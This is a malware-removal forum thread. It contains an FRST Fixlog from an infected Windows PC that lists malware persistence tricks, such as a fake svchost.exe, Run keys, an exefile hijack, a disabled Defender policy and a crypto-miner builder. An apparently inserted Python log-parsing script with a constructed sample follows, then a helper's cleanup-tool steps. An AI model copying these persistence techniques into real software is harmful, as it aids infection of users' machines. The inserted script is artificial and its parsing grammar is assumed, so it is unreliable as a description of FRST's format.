2018-08-22 19:19 - 2018-08-22 19:19 - 000016384 _____ (Nicole R. Cosentino ) C:\Users\Betts\AppData\Local\Temp\tuna.exe
2018-10-07 15:22 - 2017-04-06 01:05 - 000134000 _____ () C:\Users\Betts\AppData\Local\Temp\Uninstall.exe
2018-05-09 07:29 - 2018-05-09 07:29 - 001130840 _____ (Google Inc.) C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers1-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers3: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => -> No File
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers4: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers5: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers6: [KyShellExt] -> {FB451ACC-65B5-456a-A84E-6F9B8B75B078} => -> No File
ContextMenuHandlers6-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
Task: {88D277A6-0226-4F8D-8001-20D332B2AA29} - System32\Tasks\Update\helpars => C:\Users\Betts\AppData\Roaming\System.exe <==== ATTENTION
C:\Users\Betts\AppData\Roaming\System.exe
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [133]
AlternateDataStreams: C:\Users\Betts\Cookies:Z9Vd5wjyCnrKb1R3FN3u9uOY [2266]
AlternateDataStreams: C:\Users\Betts\Local Settings:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Application Data:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9:7Gt0kJJ90PbKkfYIBRyj [2158]
HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION

*****************

[4140] C:\Users\Betts\AppData\Local\Temp\svchost.exe => process closed successfully.
C:\Users\Betts\AppData\Local\Temp\svchost.exe => moved successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\Autodesk Sync" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\svchost.exe" => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\csrss" => removed successfully
"C:\Users\Betts\AppData\Local\Temp\csrss.txt" => not found
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\6879fe793de5f826544fc9bd3b3ae212" => removed successfully
C:\ProgramData\audio.exe => moved successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\svchost.exe" => removed successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows\\Load" => removed successfully
"C:\ProgramData\msanis.exe" => not found
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7f7bd46c-632b-11e3-acad-c8600099836d} => removed successfully
HKLM\Software\Classes\CLSID\{7f7bd46c-632b-11e3-acad-c8600099836d} => not found
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" => removed successfully
Could not move "C:\Windows\SysWOW64\Windows Server\wserver.exe" => Scheduled to move on reboot.
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}" => removed successfully
HKLM\Software\Classes\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD} => not found
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}" => removed successfully
HKLM\SOFTWARE\WOW6432Node\Classes\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD} => not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url => moved successfully
C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe => moved successfully
Could not move "C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe" => Scheduled to move on reboot.
Could not move "C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe" => Scheduled to move on reboot.
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe => moved successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe" => not found
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => removed successfully
HKLM\Software\Classes\CLSID\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{97ab88ef-346b-4179-a0b1-7445896547a5}" => removed successfully
HKLM\Software\Classes\CLSID\{97ab88ef-346b-4179-a0b1-7445896547a5} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{97ab88ef-346b-4179-a0b1-7445896547a5}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{97ab88ef-346b-4179-a0b1-7445896547a5} => not found
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb-roaming.16 => removed successfully
HKLM\Software\Classes\CLSID\{83C25742-A9F7-49FB-9138-434302C88D07} => removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb.16 => removed successfully
HKLM\Software\Classes\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB} => removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\skypec2c => removed successfully
HKLM\Software\Classes\CLSID\{91774881-D725-4E58-B298-07617B9B86A8} => not found
C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org => path removed successfully
C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com => path removed successfully
"HKLM\Software\Mozilla\Firefox\Extensions\\webrootsecure@webroot.com" => removed successfully
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\webrootsecurewebextensions@webroot.com" => removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0 => removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@kuaiyong.yrtd.com,version=1.0.1.1 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk => removed successfully
C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
C:\Users\Betts\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooblpjoncpjmbncgocjlnannofkjjhnp => moved successfully
HKLM\System\CurrentControlSet\Services\esgiguard => removed successfully
esgiguard => service removed successfully
HKLM\System\CurrentControlSet\Services\GGSAFERDriver => removed successfully
GGSAFERDriver => service removed successfully
HKLM\System\CurrentControlSet\Services\gkernel => removed successfully
gkernel => service removed successfully
HKLM\System\CurrentControlSet\Services\hQjWNzqD => removed successfully
hQjWNzqD => service removed successfully
HKLM\System\CurrentControlSet\Services\kzeXHiXd => removed successfully
kzeXHiXd => service removed successfully
HKLM\System\CurrentControlSet\Services\memudrv => removed successfully
memudrv => service removed successfully
HKLM\System\CurrentControlSet\Services\pzLPPFej => removed successfully
pzLPPFej => service removed successfully
HKLM\System\CurrentControlSet\Services\SR => removed successfully
SR => service removed successfully
HKLM\System\CurrentControlSet\Services\srservice => removed successfully
srservice => service removed successfully
C:\ProgramData\1.exe => moved successfully
C:\ProgramData\2.exe => moved successfully
"C:\ProgramData\audio.exe" => not found
C:\ProgramData\xhhjtiwtw.exe => moved successfully
C:\ProgramData\XMR Builder.exe => moved successfully
C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat => moved successfully
C:\Users\Betts\AppData\Roaming\droid4xinstaller.log => moved successfully
C:\Users\Betts\AppData\Roaming\msconfig.ini => moved successfully
C:\Users\Betts\AppData\Roaming\room_v3.dat => moved successfully
C:\Users\Betts\AppData\Roaming\winscp.rnd => moved successfully
C:\Users\Betts\AppData\Local\InstallationConfiguration.xml => moved successfully
C:\Users\Betts\AppData\Local\installer.dat => moved successfully
C:\Users\Betts\AppData\Local\keyfile3.drm => moved successfully
C:\Users\Betts\AppData\Local\recently-used.xbel => moved successfully
C:\Users\Betts\AppData\Local\Resmon.ResmonCfg => moved successfully
C:\Users\Betts\AppData\Local\sham.db => moved successfully
C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6} => moved successfully
C:\Users\Betts\AppData\Local\~Report2.txt => moved successfully
"C:\Users\Betts\AppData\Local\Temp\svchost.exe .." => not found
"C:\ProgramData\audio.exe .." => not found
"C:\Users\Betts\AppData\Roaming\msconfig.ini" => not found
C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\222.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\23435.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\317.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\419204dddd.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\cubesta.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\fag.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\fagw.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\Garena.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\global_installer.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ketup.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\lame_enc.dll => moved successfully
C:\Users\Betts\AppData\Local\Temp\mb-clean.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\merun.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\novol.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00000.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00001.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00002.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00003.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00004.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00005.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\ose00006.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\setup.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\sprun.exe => moved successfully
"C:\Users\Betts\AppData\Local\Temp\svchost.exe" => not found
C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\tuna.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\Uninstall.exe => moved successfully
C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe => moved successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay => removed successfully
HKLM\Software\Classes\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub) => removed successfully
HKLM\Software\Classes\CLSID\{99FD978C-D287-4F50-827F-B2C658EDA8E7} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub) => removed successfully
HKLM\Software\Classes\CLSID\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) => removed successfully
HKLM\Software\Classes\CLSID\{920E6DB1-9907-4370-B3A0-BAFC03D81399} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder) => removed successfully
HKLM\Software\Classes\CLSID\{16F3DD56-1AF5-4347-846D-7C10C4192619} => not found
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark) => removed successfully
HKLM\Software\Classes\CLSID\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{99FD978C-D287-4F50-827F-B2C658EDA8E7} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{920E6DB1-9907-4370-B3A0-BAFC03D81399} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{16F3DD56-1AF5-4347-846D-7C10C4192619} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark) => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\TuneUp Shredder Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => not found
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\TuneUp Disk Space Explorer Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4838CD50-7E5D-4811-9B17-C47A85539F28} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\TuneUp Shredder Shell Extension => removed successfully
HKLM\Software\Classes\CLSID\{4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => not found
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\KyShellExt => removed successfully
HKLM\Software\Classes\CLSID\{FB451ACC-65B5-456a-A84E-6F9B8B75B078} => not found
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{88D277A6-0226-4F8D-8001-20D332B2AA29}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88D277A6-0226-4F8D-8001-20D332B2AA29}" => removed successfully
C:\Windows\System32\Tasks\Update\helpars => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update\helpars" => removed successfully
"C:\Users\Betts\AppData\Roaming\System.exe" => not found
C:\ProgramData\TEMP => ":05E9FFE5" ADS removed successfully
C:\Users\Betts\Cookies => ":Z9Vd5wjyCnrKb1R3FN3u9uOY" ADS removed successfully
C:\Users\Betts\Local Settings => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS removed successfully
"C:\Users\Betts\AppData\Local" => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS not found.
"C:\Users\Betts\AppData\Local\Application Data" => ":Sr8HGrESrmGgd8t2MMMzW7w" ADS not found.
C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9 => ":7Gt0kJJ90PbKkfYIBRyj" ADS removed successfully
HKU\.DEFAULT\Software\Classes\exefile => removed successfully
HKU\.DEFAULT\Software\Classes\.exe => removed successfully
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile => removed successfully
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe => removed successfully

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 02-11-2018 13:56:32)

C:\Windows\SysWOW64\Windows Server\wserver.exe => Is moved successfully
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe => Is moved successfully
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe => Is moved successfully

==== End of Fixlog 13:56:32 ====
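The Fixlog above is read by eye in this thread. As an added example (not FRST's code and not the forum helper's), the Python script below parses Fixlog action lines in the format shown, tallies the outcomes, checks that every item FRST reported as "Scheduled to move on reboot" is confirmed in the "Result of scheduled files to move" section, and flags file targets that borrow a Windows system binary name (svchost.exe, csrss.exe, ...) from a directory other than System32 or SysWOW64. The sample log is a constructed excerpt in the same line format; it deliberately leaves out one post-reboot confirmation so the unresolved check has something to report. The line grammar is an assumption inferred from the visible log lines, not a documented FRST format.

```python
import re
from collections import Counter

# Constructed excerpt in the FRST Fixlog line format seen in the thread. It is
# not the full log: the post-reboot confirmation for the Startup .exe is left
# out on purpose so the reconciliation check below has something to report.
SAMPLE_FIXLOG = r"""
[4140] C:\Users\Betts\AppData\Local\Temp\svchost.exe => process closed successfully.
C:\Users\Betts\AppData\Local\Temp\svchost.exe => moved successfully
"HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Windows\CurrentVersion\Run\\csrss" => removed successfully
"C:\Users\Betts\AppData\Local\Temp\csrss.txt" => not found
Could not move "C:\Windows\SysWOW64\Windows Server\wserver.exe" => Scheduled to move on reboot.
Could not move "C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe" => Scheduled to move on reboot.
C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe => moved successfully
"C:\Users\Betts\AppData\Roaming\System.exe" => not found
C:\ProgramData\TEMP => ":05E9FFE5" ADS removed successfully
esgiguard => service removed successfully

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 02-11-2018 13:56:32)

C:\Windows\SysWOW64\Windows Server\wserver.exe => Is moved successfully

==== End of Fixlog 13:56:32 ====
"""

# One Fixlog action line (assumed grammar): optional "[pid] " or "Could not move "
# prefix, an optionally quoted target, " => ", then the outcome text; a trailing
# "." on the outcome is dropped. Header and separator lines have no " => ".
LINE_RE = re.compile(
    r'^(?:\[\d+\]\s+|Could not move\s+)?"?(?P<target>.+?)"?\s+=>\s+(?P<result>.+?)\.?$'
)

# Names that only belong in the Windows system directories.
SYSTEM_BINARY_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "smss.exe",
                       "winlogon.exe", "services.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def classify(result):
    """Map FRST outcome text to a coarse status."""
    r = result.lower()
    if "scheduled to move on reboot" in r:
        return "deferred"          # file was locked; FRST retries at boot
    if r.startswith("is moved successfully"):
        return "moved_on_reboot"   # confirmation from the post-reboot section
    if "not found" in r:
        return "not_found"         # target already gone, or the path was wrong
    if "successfully" in r:
        return "done"
    return "other"


def parse_fixlog(text):
    """Return one {'target', 'result', 'status'} dict per action line."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # headers, separators, blank lines
        target, result = m.group("target"), m.group("result")
        entries.append({"target": target, "result": result, "status": classify(result)})
    return entries


def summarize(entries):
    """Count entries per status."""
    return dict(Counter(e["status"] for e in entries))


def reconcile(entries):
    """Every deferred move must show up again as 'Is moved successfully'."""
    deferred = {e["target"] for e in entries if e["status"] == "deferred"}
    moved = {e["target"] for e in entries if e["status"] == "moved_on_reboot"}
    return {
        "confirmed": sorted(deferred & moved),
        "unresolved": sorted(deferred - moved),  # still on disk: needs another fix
    }


def masquerading_paths(entries):
    """File targets using a system binary name outside System32/SysWOW64."""
    hits = set()
    for e in entries:
        t = e["target"]
        if not re.match(r"^[a-z]:\\", t, re.IGNORECASE):
            continue  # registry keys, service names and ADS owners are skipped
        name = t.rsplit("\\", 1)[-1].lower()
        if name in SYSTEM_BINARY_NAMES and not t.lower().startswith(SYSTEM_DIRS):
            hits.add(t)
    return sorted(hits)


if __name__ == "__main__":
    found = parse_fixlog(SAMPLE_FIXLOG)
    print(summarize(found))
    print(reconcile(found))
    print(masquerading_paths(found))
```

Run against a real Fixlog.txt by replacing SAMPLE_FIXLOG with the file's contents. An entry in "unresolved" means the locked file survived the reboot and the next fix list should target it again; anything in the masquerade list is worth submitting to a multi-engine scanner before the machine is declared clean, since a svchost.exe in Temp or a Startup folder never belongs there.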
 

Broni

Malware Annihilator
Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double click on downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Remove Selected.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.
Please download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • The Scan log is available through History -> Application logs. Please post its contents in your next reply.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8/10 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • Review the results...see note below
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
